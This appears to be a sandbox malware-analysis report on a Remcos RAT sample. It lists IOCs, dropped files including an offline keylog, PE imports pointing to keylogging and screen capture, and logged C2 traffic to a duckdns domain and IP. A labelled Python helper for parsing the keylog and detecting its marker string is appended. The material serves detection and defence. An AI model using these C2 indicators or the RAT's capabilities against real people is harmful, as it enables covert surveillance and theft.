geoplugin.net | 1732086011ea45d03916726c55fa40ae0b8f39b9a24a40da5a5e79d29c703a7fb444bdeb31407.dat-decoded.exe | malicious | Remcos | 178.237.33.50
geoplugin.net | USD470900_COPY_800BLHSBC882001_NOV202024.PDF.exe | malicious | Remcos, DBatLoader | 178.237.33.50
geoplugin.net | Pago_BBVA.pdf.bat.exe | malicious | Remcos | 178.237.33.50
geoplugin.net | USD470900_COPY_800BLHSBC882001.PDF.bat | malicious | Remcos, DBatLoader | 178.237.33.50
geoplugin.net | globe_product_order_korea_buy_20_11_2024_000000000000000000.vbs | malicious | GuLoader, Remcos | 178.237.33.50
geoplugin.net | file.exe | malicious | Remcos | 178.237.33.50
Match | Associated Sample Name / URL | Detection | Threat Name | Context
COLOMBIATELECOMUNICACIONESSAESPCO | 17321475076803448d101dbd20e7eb8f565a5a8db8f024eed2198a76bc7e212f0903aa57bf101.dat-decoded.exe | malicious | AsyncRAT, DcRat | 186.169.34.190
COLOMBIATELECOMUNICACIONESSAESPCO | mips.elf | malicious | Mirai | 179.48.76.62
COLOMBIATELECOMUNICACIONESSAESPCO | hmips.elf | malicious | Mirai | 152.204.102.83
COLOMBIATELECOMUNICACIONESSAESPCO | botx.x86.elf | malicious | Mirai | 190.65.133.108
COLOMBIATELECOMUNICACIONESSAESPCO | qkbfi86.elf | malicious | Mirai | 191.109.65.158
COLOMBIATELECOMUNICACIONESSAESPCO | meerkat.x86.elf | malicious | Mirai | 186.168.73.118
COLOMBIATELECOMUNICACIONESSAESPCO | amen.mpsl.elf | malicious | Mirai | 190.67.85.78
COLOMBIATELECOMUNICACIONESSAESPCO | botnet.x86.elf | malicious | Mirai, Moobot | 167.2.201.184
COLOMBIATELECOMUNICACIONESSAESPCO | botnet.m68k.elf | malicious | Mirai, Moobot | 167.8.217.10
COLOMBIATELECOMUNICACIONESSAESPCO | 17310720655e73e0949bf79720da6be3e741758a040fb1e79235dccb7226a52f8c2fa1d13c495.dat-decoded.exe | malicious | AsyncRAT, DcRat | 152.202.226.52
ATOM86-ASATOM86NL | 1732143786cec792bea7f8ce7f818c031173ce52fabd19dde842f74b07fc234dc9f3fa1dcf839.dat-decoded.exe | malicious | Remcos | 178.237.33.50
ATOM86-ASATOM86NL | seethebestthignswhichgivingbestopportunities.hta | malicious | Cobalt Strike, Remcos, HTMLPhisher | 178.237.33.50
ATOM86-ASATOM86NL | pi-77159.xls | malicious | Remcos, HTMLPhisher | 178.237.33.50
ATOM86-ASATOM86NL | sostener.vbs | malicious | Remcos | 178.237.33.50
ATOM86-ASATOM86NL | 1732086011ea45d03916726c55fa40ae0b8f39b9a24a40da5a5e79d29c703a7fb444bdeb31407.dat-decoded.exe | malicious | Remcos | 178.237.33.50
ATOM86-ASATOM86NL | USD470900_COPY_800BLHSBC882001_NOV202024.PDF.exe | malicious | Remcos, DBatLoader | 178.237.33.50
ATOM86-ASATOM86NL | Pago_BBVA.pdf.bat.exe | malicious | Remcos | 178.237.33.50
ATOM86-ASATOM86NL | USD470900_COPY_800BLHSBC882001.PDF.bat | malicious | Remcos, DBatLoader | 178.237.33.50
ATOM86-ASATOM86NL | globe_product_order_korea_buy_20_11_2024_000000000000000000.vbs | malicious | GuLoader, Remcos | 178.237.33.50
ATOM86-ASATOM86NL | file.exe | malicious | Remcos | 178.237.33.50
                                        Process:C:\Users\user\Desktop\1732147507ac10953a908ae794c5ee180add9124a78c69705135688e502bb56ce4453da749198.dat-decoded.exe
                                        File Type:data
                                        Category:dropped
                                        Size (bytes):144
                                        Entropy (8bit):3.349210161123417
                                        Encrypted:false
                                        SSDEEP:3:rhlKlf4OlclNef1ClDl5JWRal2Jl+7R0DAlBG45klovDl6v:6lfJlc2wl55YcIeeDAlOWAv
                                        MD5:F77DFD7E6BFF8009C0A971EBCD0E964B
                                        SHA1:229C9625E4D0E1F208D861D4A21098FC2C99ADBD
                                        SHA-256:F28810C683769855CA784B3705D6200842FE635869FE11CDDABC7245BAE5AB89
                                        SHA-512:54CF062E1A3186C14869718DC32C9559575D9D0CCBAD0E466CB918F1A44B2589B68F892367B1DB14653C8DEE2C87AF8CB192D818227F49BFD5E5ADB7EDCCCE9A
                                        Malicious:true
                                        Yara Hits:
                                        • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: C:\ProgramData\remcos\registros.dat, Author: Joe Security
                                        Reputation:low
Preview (raw):....[.2.0.2.4./.1.1./.2.0. .1.9.:.0.7.:.0.0. .O.f.f.l.i.n.e. .K.e.y.l.o.g.g.e.r. .S.t.a.r.t.e.d.].........[.P.r.o.g.r.a.m. .M.a.n.a.g.e.r.].....
Preview (decoded as UTF-16LE; the dots are null high bytes and CR/LF line ends):
[2024/11/20 19:07:00 Offline Keylogger Started]
[Program Manager]
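The registros.dat keylog above is UTF-16LE text with CRLF line ends, which is why the preview shows a dot between every character. The following example is added here and is not part of the Joe Sandbox report: it rebuilds the file from that preview, checks a candidate file for the Remcos marker string, and splits the log into per-window sessions (Remcos writes the foreground window title in square brackets and the captured keystrokes on the lines that follow). The reconstruction and the helper names are mine; the rebuilt buffer is 144 bytes, the size the report lists, and hashing it lets you compare against the report's MD5 (F77DFD7E6BFF8009C0A971EBCD0E964B) to confirm the reconstruction is byte-exact.

```python
import hashlib
import re

# Constructed test input: C:\ProgramData\remcos\registros.dat rebuilt from the report's
# preview. Remcos stores the offline keylog as UTF-16LE without a BOM, CRLF line ends,
# and the active window title in square brackets. Encoded length is 144 bytes.
REGISTROS_DAT = (
    "\r\n"
    "[2024/11/20 19:07:00 Offline Keylogger Started]\r\n"
    "\r\n"
    "[Program Manager]\r\n"
).encode("utf-16-le")

# The marker as it appears on disk (UTF-16LE), usable as a hunting pattern for this artifact.
START_MARKER = "Offline Keylogger Started".encode("utf-16-le")
HEADER_RE = re.compile(r"^\[(.*)\]$")


def looks_like_remcos_keylog(data: bytes) -> bool:
    """Cheap triage check: the marker sits in the first kilobyte and the bytes decode as UTF-16LE."""
    if START_MARKER not in data[:1024]:
        return False
    try:
        data.decode("utf-16-le")
    except UnicodeDecodeError:
        return False
    return True


def parse_remcos_keylog(data: bytes) -> list[dict]:
    """Split the log into sessions: each bracketed header opens a new entry and the
    non-empty lines after it are the keystrokes captured while that window was active."""
    text = data.decode("utf-16-le")
    entries = []
    for line in text.split("\r\n"):
        m = HEADER_RE.match(line)
        if m:
            entries.append({"header": m.group(1), "keys": ""})
        elif line and entries:
            entries[-1]["keys"] += line
    return entries


def describe(data: bytes) -> dict:
    """Summary in the shape an analyst pastes into a report: size, hashes, sessions."""
    return {
        "size": len(data),
        "md5": hashlib.md5(data).hexdigest().upper(),
        "sha256": hashlib.sha256(data).hexdigest().upper(),
        "is_remcos_keylog": looks_like_remcos_keylog(data),
        "entries": parse_remcos_keylog(data),
    }


if __name__ == "__main__":
    import json
    print(json.dumps(describe(REGISTROS_DAT), indent=2))
```

Run it against a real registros.dat by replacing REGISTROS_DAT with the file's bytes; a log with typed input will show the keystrokes under the window title they were typed into.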
                                        Process:C:\Users\user\Desktop\1732147507ac10953a908ae794c5ee180add9124a78c69705135688e502bb56ce4453da749198.dat-decoded.exe
                                        File Type:JSON data
                                        Category:dropped
                                        Size (bytes):962
                                        Entropy (8bit):5.01442467270497
                                        Encrypted:false
                                        SSDEEP:12:tkluQ+nd6UGkMyGWKyGXPVGArwY307f7aZHI7GZArpv/mOAaNO+ao9W7iN5zzkwV:qluQydVauKyGX85jvXhNlT3/7AcV9Wro
                                        MD5:4A8FAD17775993221C3AD2D68BB4B306
                                        SHA1:DB42C3975A64E7B4CE2A93FF5AF91F2DF73C82BD
                                        SHA-256:893F1B254D4EC2484868976F1B62D5A064909EA08E46F95193DBE79DB435E604
                                        SHA-512:63252CFDC2CC7A32F86D9CB5D27E1695A8C138EBFBF476741C017EB349F20BDC72FF5856E0044DB189BAABDB1C3819C29FFC33A054810BD0354726300063D52C
                                        Malicious:false
                                        Reputation:low
Preview:
{
  "geoplugin_request":"8.46.123.75",
  "geoplugin_status":200,
  "geoplugin_delay":"2ms",
  "geoplugin_credit":"Some of the returned data includes GeoLite2 data created by MaxMind, available from <a href='https:\/\/www.maxmind.com'>https:\/\/www.maxmind.com<\/a>.",
  "geoplugin_city":"New York",
  "geoplugin_region":"New York",
  "geoplugin_regionCode":"NY",
  "geoplugin_regionName":"New York",
  "geoplugin_areaCode":"",
  "geoplugin_dmaCode":"501",
  "geoplugin_countryCode":"US",
  "geoplugin_countryName":"United States",
  "geoplugin_inEU":0,
  "geoplugin_euVATrate":false,
  "geoplugin_continentCode":"NA",
  "geoplugin_continentName":"North America",
  "geoplugin_latitude":"40.7123",
  "geoplugin_longitude":"-74.0068",
  "geoplugin_locationAccuracyRadius":"20",
  "geoplugin_timezone":"America\/New_York",
  "geoplugin_currencyCode":"USD",
  "geoplugin_currencySymbol":"$",
  "geoplugin_currencySymbol_UTF8":"$",
  "geoplugin_currencyConverter":0
}
                                        File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                        Entropy (8bit):6.6004596667154685
                                        TrID:
                                        • Win32 Executable (generic) a (10002005/4) 99.96%
                                        • Generic Win/DOS Executable (2004/3) 0.02%
                                        • DOS Executable Generic (2002/1) 0.02%
                                        • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                        File name:1732147507ac10953a908ae794c5ee180add9124a78c69705135688e502bb56ce4453da749198.dat-decoded.exe
                                        File size:494'592 bytes
                                        MD5:3cc6b6ef2d90a55b3a9cb4b2f9c1526c
                                        SHA1:fbc78cbbc06ab9f435fd3ec2fc46cf3a8c433dcf
                                        SHA256:eafb4332827f8e2eccc30716537cfb9fdc3112b369d519b1fdfd9c5b39b8f1ce
                                        SHA512:f1143c6c4253b3c353cf5331f958c9f9b2a301097ccf8fd683a003ddc1258d91b44284202d2e72e46b817f544811ec7c9a883032f7a9f1e4fa5a370a2f1e794b
                                        SSDEEP:6144:u5zY+w1LqZBCxKedv//NEUn+N5hkf/0TE7RvIZ/jbsAORZzAXMcrJA4:u5k+Yqaxrh3Nln+N52fIA4jbsvZziA4
                                        TLSH:0EB4AE01BAD2C072D57514300D3AF776EAB8BD201836497B73DA1D5BFE31190A72AAB7
                                        File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........{.-H..~H..~H..~..'~[..~..%~...~..$~V..~AbR~I..~...~J..~.D..R..~.D..r..~.D..j..~AbE~Q..~H..~v..~.D..,..~.D)~I..~.D..I..~RichH..
                                        Icon Hash:95694d05214c1b33
                                        Entrypoint:0x434a80
                                        Entrypoint Section:.text
                                        Digitally signed:false
                                        Imagebase:0x400000
                                        Subsystem:windows gui
                                        Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                        DLL Characteristics:TERMINAL_SERVER_AWARE
                                        Time Stamp:0x6710C0B1 [Thu Oct 17 07:45:53 2024 UTC]
                                        TLS Callbacks:
                                        CLR (.Net) Version:
                                        OS Version Major:5
                                        OS Version Minor:1
                                        File Version Major:5
                                        File Version Minor:1
                                        Subsystem Version Major:5
                                        Subsystem Version Minor:1
                                        Import Hash:1389569a3a39186f3eb453b501cfe688
                                        Instruction
                                        call 00007F2F4CB4E05Bh
                                        jmp 00007F2F4CB4DAA3h
                                        push ebp
                                        mov ebp, esp
                                        sub esp, 00000324h
                                        push ebx
                                        push esi
                                        push 00000017h
                                        call 00007F2F4CB702F3h
                                        test eax, eax
                                        je 00007F2F4CB4DC17h
                                        mov ecx, dword ptr [ebp+08h]
                                        int 29h
                                        xor esi, esi
                                        lea eax, dword ptr [ebp-00000324h]
                                        push 000002CCh
                                        push esi
                                        push eax
                                        mov dword ptr [00471D14h], esi
                                        call 00007F2F4CB50066h
                                        add esp, 0Ch
                                        mov dword ptr [ebp-00000274h], eax
                                        mov dword ptr [ebp-00000278h], ecx
                                        mov dword ptr [ebp-0000027Ch], edx
                                        mov dword ptr [ebp-00000280h], ebx
                                        mov dword ptr [ebp-00000284h], esi
                                        mov dword ptr [ebp-00000288h], edi
                                        mov word ptr [ebp-0000025Ch], ss
                                        mov word ptr [ebp-00000268h], cs
                                        mov word ptr [ebp-0000028Ch], ds
                                        mov word ptr [ebp-00000290h], es
                                        mov word ptr [ebp-00000294h], fs
                                        mov word ptr [ebp-00000298h], gs
                                        pushfd
                                        pop dword ptr [ebp-00000264h]
                                        mov eax, dword ptr [ebp+04h]
                                        mov dword ptr [ebp-0000026Ch], eax
                                        lea eax, dword ptr [ebp+04h]
                                        mov dword ptr [ebp-00000260h], eax
                                        mov dword ptr [ebp-00000324h], 00010001h
                                        mov eax, dword ptr [eax-04h]
                                        push 00000050h
                                        mov dword ptr [ebp-00000270h], eax
                                        lea eax, dword ptr [ebp-58h]
                                        push esi
                                        push eax
                                        call 00007F2F4CB4FFDDh
                                        Programming Language:
                                        • [C++] VS2008 SP1 build 30729
                                        • [IMP] VS2008 SP1 build 30729
Name | Virtual Address | Virtual Size | Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IMPORT | 0x6eeb8 | 0x104 | .rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x79000 | 0x4ae4 | .rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x7e000 | 0x3bc8 | .reloc
IMAGE_DIRECTORY_ENTRY_DEBUG | 0x6d350 | 0x38 | .rdata
IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_TLS | 0x6d3e4 | 0x18 | .rdata
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x6d388 | 0x40 | .rdata
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IAT | 0x59000 | 0x500 | .rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
.text | 0x1000 | 0x571f5 | 0x57200 | 42490688bcf3aaa371282a7454b99e23 | False | 0.5716155173959828 | data | 6.625772280516175 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rdata | 0x59000 | 0x179dc | 0x17a00 | 8c19f58f5a4e5f2d5359d54234473252 | False | 0.5008370535714286 | data | 5.862025333737917 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data | 0x71000 | 0x5d54 | 0xe00 | 0eaccffe1cb836994ce5d3ccfb22d4f9 | False | 0.22126116071428573 | data | 3.0035180736120775 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.tls | 0x77000 | 0x9 | 0x200 | 1f354d76203061bfdd5a53dae48d5435 | False | 0.033203125 | data | 0.020393135236084953 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.gfids | 0x78000 | 0x230 | 0x400 | 9ca325bce9f8c0342c0381814603584a | False | 0.330078125 | data | 2.3999762503719224 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.rsrc | 0x79000 | 0x4ae4 | 0x4c00 | 09724eb8731eaf186abd444537b3ccca | False | 0.2783203125 | data | 3.979487702487559 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc | 0x7e000 | 0x3bc8 | 0x3c00 | 71caad037f5f2070293ebf9ebb49e4e2 | False | 0.764453125 | data | 6.724383647387111 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
Name | RVA | Size | Type | Language | Country | ZLIB Complexity
RT_ICON | 0x7918c | 0x468 | Device independent bitmap graphic, 16 x 32 x 32, image size 1088 | English | United States | 0.3421985815602837
RT_ICON | 0x795f4 | 0x988 | Device independent bitmap graphic, 24 x 48 x 32, image size 2400 | English | United States | 0.27704918032786885
RT_ICON | 0x79f7c | 0x10a8 | Device independent bitmap graphic, 32 x 64 x 32, image size 4224 | English | United States | 0.23686679174484052
RT_ICON | 0x7b024 | 0x25a8 | Device independent bitmap graphic, 48 x 96 x 32, image size 9600 | English | United States | 0.22977178423236513
RT_RCDATA | 0x7d5cc | 0x4d8 | data | | | 1.0088709677419354
RT_GROUP_ICON | 0x7daa4 | 0x3e | data | English | United States | 0.8064516129032258
DLL | Import
KERNEL32.dll | FindNextFileA, ExpandEnvironmentStringsA, GetLongPathNameW, CopyFileW, GetLocaleInfoA, CreateToolhelp32Snapshot, Process32NextW, Process32FirstW, VirtualProtect, SetLastError, VirtualFree, VirtualAlloc, GetNativeSystemInfo, HeapAlloc, GetProcessHeap, FreeLibrary, IsBadReadPtr, GetTempPathW, OpenProcess, OpenMutexA, lstrcatW, GetCurrentProcessId, GetTempFileNameW, UnmapViewOfFile, DuplicateHandle, CreateFileMappingW, MapViewOfFile, GetSystemDirectoryA, GlobalAlloc, GlobalLock, GetTickCount, GlobalUnlock, WriteProcessMemory, ResumeThread, GetThreadContext, ReadProcessMemory, CreateProcessW, SetThreadContext, LocalAlloc, GlobalFree, MulDiv, SizeofResource, QueryDosDeviceW, FindFirstVolumeW, GetConsoleScreenBufferInfo, SetConsoleTextAttribute, lstrlenW, GetStdHandle, SetFilePointer, FindResourceA, LockResource, LoadResource, LocalFree, FindVolumeClose, GetVolumePathNamesForVolumeNameW, lstrcpyW, FindFirstFileA, FormatMessageA, FindNextVolumeW, AllocConsole, lstrcmpW, GetModuleFileNameA, lstrcpynA, QueryPerformanceFrequency, QueryPerformanceCounter, EnterCriticalSection, LeaveCriticalSection, InitializeCriticalSection, DeleteCriticalSection, HeapSize, WriteConsoleW, SetStdHandle, SetEnvironmentVariableW, SetEnvironmentVariableA, FreeEnvironmentStringsW, GetEnvironmentStringsW, GetCommandLineW, GetCommandLineA, GetOEMCP, IsValidCodePage, FindFirstFileExA, ReadConsoleW, GetConsoleMode, GetConsoleCP, FlushFileBuffers, GetFileType, GetTimeZoneInformation, EnumSystemLocalesW, GetUserDefaultLCID, IsValidLocale, GetTimeFormatW, GetDateFormatW, HeapReAlloc, GetACP, GetModuleHandleExW, MoveFileExW, RtlUnwind, RaiseException, LoadLibraryExW, GetCPInfo, GetStringTypeW, GetLocaleInfoW, LCMapStringW, CompareStringW, TlsFree, TlsSetValue, TlsGetValue, TlsAlloc, GetFileSize, TerminateThread, GetLastError, CreateDirectoryW, GetModuleHandleA, RemoveDirectoryW, MoveFileW, SetFilePointerEx, GetLogicalDriveStringsA, DeleteFileW, DeleteFileA, SetFileAttributesW, GetFileAttributesW, FindClose, lstrlenA, GetDriveTypeA, FindNextFileW, GetFileSizeEx, FindFirstFileW, GetModuleHandleW, ExitProcess, CreateMutexA, GetCurrentProcess, GetProcAddress, LoadLibraryA, CreateProcessA, PeekNamedPipe, CreatePipe, TerminateProcess, ReadFile, HeapFree, HeapCreate, CreateEventA, GetLocalTime, CreateThread, SetEvent, CreateEventW, WaitForSingleObject, Sleep, GetModuleFileNameW, CloseHandle, ExitThread, CreateFileW, WriteFile, SetConsoleOutputCP, InitializeCriticalSectionAndSpinCount, MultiByteToWideChar, DecodePointer, EncodePointer, WideCharToMultiByte, InitializeSListHead, GetSystemTimeAsFileTime, GetCurrentThreadId, IsProcessorFeaturePresent, GetStartupInfoW, SetUnhandledExceptionFilter, UnhandledExceptionFilter, IsDebuggerPresent, WaitForSingleObjectEx, ResetEvent, SetEndOfFile
USER32.dll | GetMessageA, GetWindowTextW, wsprintfW, GetClipboardData, UnhookWindowsHookEx, GetForegroundWindow, ToUnicodeEx, GetKeyboardLayout, SetWindowsHookExA, CloseClipboard, OpenClipboard, GetKeyboardState, CallNextHookEx, GetKeyboardLayoutNameA, GetKeyState, GetWindowTextLengthW, DispatchMessageA, SetForegroundWindow, SetClipboardData, EnumWindows, ExitWindowsEx, EmptyClipboard, ShowWindow, SetWindowTextW, MessageBoxW, IsWindowVisible, CloseWindow, SendInput, EnumDisplaySettingsW, mouse_event, CreatePopupMenu, TranslateMessage, TrackPopupMenu, DefWindowProcA, CreateWindowExA, AppendMenuA, GetSystemMetrics, RegisterClassExA, GetCursorPos, SystemParametersInfoW, GetWindowThreadProcessId, MapVirtualKeyA, DrawIcon, GetIconInfo
GDI32.dll | BitBlt, CreateCompatibleBitmap, SelectObject, CreateCompatibleDC, StretchBlt, GetDIBits, DeleteObject, CreateDCA, GetObjectA, DeleteDC
ADVAPI32.dll | CryptAcquireContextA, CryptGenRandom, CryptReleaseContext, GetUserNameW, RegEnumKeyExA, QueryServiceStatus, CloseServiceHandle, OpenSCManagerW, OpenSCManagerA, ControlService, StartServiceW, QueryServiceConfigW, ChangeServiceConfigW, OpenServiceW, EnumServicesStatusW, AdjustTokenPrivileges, LookupPrivilegeValueA, OpenProcessToken, RegCreateKeyA, RegCloseKey, RegQueryInfoKeyW, RegQueryValueExA, RegCreateKeyExW, RegEnumKeyExW, RegSetValueExW, RegSetValueExA, RegOpenKeyExA, RegOpenKeyExW, RegCreateKeyW, RegDeleteValueW, RegEnumValueW, RegQueryValueExW, RegDeleteKeyA
SHELL32.dll | ShellExecuteExA, Shell_NotifyIconA, ExtractIconA, ShellExecuteW
ole32.dll | CoInitializeEx, CoUninitialize, CoGetObject
SHLWAPI.dll | PathFileExistsW, PathFileExistsA, StrToIntA
WINMM.dll | waveInOpen, waveInStart, waveInAddBuffer, PlaySoundW, mciSendStringA, mciSendStringW, waveInClose, waveInStop, waveInPrepareHeader, waveInUnprepareHeader
WS2_32.dll | gethostbyname, send, WSAStartup, closesocket, inet_ntoa, htons, htonl, getservbyname, ntohs, getservbyport, gethostbyaddr, inet_addr, WSASetLastError, WSAGetLastError, recv, connect, socket
urlmon.dll | URLOpenBlockingStreamW, URLDownloadToFileW
gdiplus.dll | GdipSaveImageToStream, GdipGetImageEncodersSize, GdipFree, GdipDisposeImage, GdipAlloc, GdipCloneImage, GdipGetImageEncoders, GdiplusStartup, GdipLoadImageFromStream
WININET.dll | InternetOpenUrlW, InternetOpenW, InternetCloseHandle, InternetReadFile
Language of compilation system | Country where language is spoken
English | United States
Timestamp | SID | Signature | Severity | Source IP | Source Port | Dest IP | Dest Port | Protocol
2024-11-21T01:07:03.504324+0100 | 2036594 | ET JA3 Hash - Remcos 3.x/4.x TLS Connection | 1 | 192.168.2.5 | 49704 | 186.169.34.190 | 1213 | TCP
2024-11-21T01:07:06.213772+0100 | 2803304 | ETPRO MALWARE Common Downloader Header Pattern HCa | 3 | 192.168.2.5 | 49705 | 178.237.33.50 | 80 | TCP
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Nov 21, 2024 01:07:02.031492949 CET | 49704 | 1213 | 192.168.2.5 | 186.169.34.190
Nov 21, 2024 01:07:02.151106119 CET | 1213 | 49704 | 186.169.34.190 | 192.168.2.5
Nov 21, 2024 01:07:02.151180029 CET | 49704 | 1213 | 192.168.2.5 | 186.169.34.190
Nov 21, 2024 01:07:02.157321930 CET | 49704 | 1213 | 192.168.2.5 | 186.169.34.190
Nov 21, 2024 01:07:02.276940107 CET | 1213 | 49704 | 186.169.34.190 | 192.168.2.5
Nov 21, 2024 01:07:03.453918934 CET | 1213 | 49704 | 186.169.34.190 | 192.168.2.5
Nov 21, 2024 01:07:03.504323959 CET | 49704 | 1213 | 192.168.2.5 | 186.169.34.190
Nov 21, 2024 01:07:03.698690891 CET | 1213 | 49704 | 186.169.34.190 | 192.168.2.5
Nov 21, 2024 01:07:03.713691950 CET | 49704 | 1213 | 192.168.2.5 | 186.169.34.190
Nov 21, 2024 01:07:03.833290100 CET | 1213 | 49704 | 186.169.34.190 | 192.168.2.5
Nov 21, 2024 01:07:03.833363056 CET | 49704 | 1213 | 192.168.2.5 | 186.169.34.190
Nov 21, 2024 01:07:03.952951908 CET | 1213 | 49704 | 186.169.34.190 | 192.168.2.5
Nov 21, 2024 01:07:04.256251097 CET | 1213 | 49704 | 186.169.34.190 | 192.168.2.5
Nov 21, 2024 01:07:04.258373976 CET | 49704 | 1213 | 192.168.2.5 | 186.169.34.190
Nov 21, 2024 01:07:04.378262997 CET | 1213 | 49704 | 186.169.34.190 | 192.168.2.5
Nov 21, 2024 01:07:04.457170963 CET | 1213 | 49704 | 186.169.34.190 | 192.168.2.5
Nov 21, 2024 01:07:04.504343033 CET | 49704 | 1213 | 192.168.2.5 | 186.169.34.190
Nov 21, 2024 01:07:04.755872965 CET | 49705 | 80 | 192.168.2.5 | 178.237.33.50
Nov 21, 2024 01:07:04.875504017 CET | 80 | 49705 | 178.237.33.50 | 192.168.2.5
Nov 21, 2024 01:07:04.875647068 CET | 49705 | 80 | 192.168.2.5 | 178.237.33.50
Nov 21, 2024 01:07:04.875797033 CET | 49705 | 80 | 192.168.2.5 | 178.237.33.50
Nov 21, 2024 01:07:04.995251894 CET | 80 | 49705 | 178.237.33.50 | 192.168.2.5
Nov 21, 2024 01:07:06.213676929 CET | 80 | 49705 | 178.237.33.50 | 192.168.2.5
Nov 21, 2024 01:07:06.213772058 CET | 49705 | 80 | 192.168.2.5 | 178.237.33.50
Nov 21, 2024 01:07:06.240336895 CET | 49704 | 1213 | 192.168.2.5 | 186.169.34.190
Nov 21, 2024 01:07:06.361443043 CET | 1213 | 49704 | 186.169.34.190 | 192.168.2.5
Nov 21, 2024 01:07:07.213330030 CET | 80 | 49705 | 178.237.33.50 | 192.168.2.5
Nov 21, 2024 01:07:07.213421106 CET | 49705 | 80 | 192.168.2.5 | 178.237.33.50
Nov 21, 2024 01:07:27.596441984 CET | 1213 | 49704 | 186.169.34.190 | 192.168.2.5
Nov 21, 2024 01:07:27.598490953 CET | 49704 | 1213 | 192.168.2.5 | 186.169.34.190
Nov 21, 2024 01:07:27.718019009 CET | 1213 | 49704 | 186.169.34.190 | 192.168.2.5
Nov 21, 2024 01:07:57.608752966 CET | 1213 | 49704 | 186.169.34.190 | 192.168.2.5
Nov 21, 2024 01:07:57.612258911 CET | 49704 | 1213 | 192.168.2.5 | 186.169.34.190
Nov 21, 2024 01:07:57.732027054 CET | 1213 | 49704 | 186.169.34.190 | 192.168.2.5
Nov 21, 2024 01:08:27.618530035 CET | 1213 | 49704 | 186.169.34.190 | 192.168.2.5
Nov 21, 2024 01:08:27.628767967 CET | 49704 | 1213 | 192.168.2.5 | 186.169.34.190
Nov 21, 2024 01:08:27.748388052 CET | 1213 | 49704 | 186.169.34.190 | 192.168.2.5
Nov 21, 2024 01:08:54.520206928 CET | 49705 | 80 | 192.168.2.5 | 178.237.33.50
Nov 21, 2024 01:08:54.832516909 CET | 49705 | 80 | 192.168.2.5 | 178.237.33.50
                                        Nov 21, 2024 01:08:55.629388094 CET4970580192.168.2.5178.237.33.50
                                        Nov 21, 2024 01:08:56.832525015 CET4970580192.168.2.5178.237.33.50
                                        Nov 21, 2024 01:08:57.627985001 CET121349704186.169.34.190192.168.2.5
                                        Nov 21, 2024 01:08:57.631968021 CET497041213192.168.2.5186.169.34.190
                                        Nov 21, 2024 01:08:57.751578093 CET121349704186.169.34.190192.168.2.5
                                        Nov 21, 2024 01:08:59.332520008 CET4970580192.168.2.5178.237.33.50
                                        Nov 21, 2024 01:09:04.223134995 CET4970580192.168.2.5178.237.33.50
                                        Nov 21, 2024 01:09:13.899424076 CET4970580192.168.2.5178.237.33.50
                                        Nov 21, 2024 01:09:27.643048048 CET121349704186.169.34.190192.168.2.5
                                        Nov 21, 2024 01:09:27.644671917 CET497041213192.168.2.5186.169.34.190
                                        Nov 21, 2024 01:09:27.764343023 CET121349704186.169.34.190192.168.2.5
                                        Nov 21, 2024 01:09:57.653112888 CET121349704186.169.34.190192.168.2.5
                                        Nov 21, 2024 01:09:57.654825926 CET497041213192.168.2.5186.169.34.190
                                        Nov 21, 2024 01:09:57.774395943 CET121349704186.169.34.190192.168.2.5
                                        Nov 21, 2024 01:10:27.675725937 CET121349704186.169.34.190192.168.2.5
                                        Nov 21, 2024 01:10:27.677356005 CET497041213192.168.2.5186.169.34.190
                                        Nov 21, 2024 01:10:27.797154903 CET121349704186.169.34.190192.168.2.5
                                        Nov 21, 2024 01:10:57.686211109 CET121349704186.169.34.190192.168.2.5
                                        Nov 21, 2024 01:10:57.689920902 CET497041213192.168.2.5186.169.34.190
                                        Nov 21, 2024 01:10:57.809727907 CET121349704186.169.34.190192.168.2.5
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Nov 21, 2024 01:07:01.691200972 CET | 50455 | 53 | 192.168.2.5 | 1.1.1.1
Nov 21, 2024 01:07:02.028549910 CET | 53 | 50455 | 1.1.1.1 | 192.168.2.5
Nov 21, 2024 01:07:04.523593903 CET | 49374 | 53 | 192.168.2.5 | 1.1.1.1
Nov 21, 2024 01:07:04.752619982 CET | 53 | 49374 | 1.1.1.1 | 192.168.2.5

Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
Nov 21, 2024 01:07:01.691200972 CET | 192.168.2.5 | 1.1.1.1 | 0x4c9c | Standard query (0) | remcos2025rem.duckdns.org | A (IP address) | IN (0x0001) | false
